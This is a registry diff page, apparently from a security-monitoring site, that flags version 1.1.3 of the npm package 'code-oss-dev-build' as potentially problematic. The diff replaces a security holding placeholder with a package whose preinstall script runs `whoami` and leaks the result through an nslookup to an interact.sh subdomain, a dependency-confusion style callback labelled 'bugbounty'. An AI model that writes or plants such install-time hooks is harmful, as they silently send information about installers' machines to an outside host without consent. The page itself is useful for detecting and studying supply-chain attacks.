code-oss-dev-build 0.0.1-security → 1.1.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of code-oss-dev-build might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/README.md +1 -5
  2. package/package.json +11 -3
package/README.md CHANGED
@@ -1,5 +1 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=code-oss-dev-build for more information.
1
+ Security Testing
package/package.json CHANGED
@@ -1,6 +1,14 @@
1
1
  {
2
2
  "name": "code-oss-dev-build",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.1.3",
4
+ "description": "Security Testing",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "echo test | nslookup `whoami`.c7fy2qa2vtc00006wnv0gdz9bmayyyyyb.interact.sh"
8
+ },
9
+ "keywords": [
10
+ "bugbounty"
11
+ ],
12
+ "author": "dk999",
13
+ "license": "ISC"
6
14
  }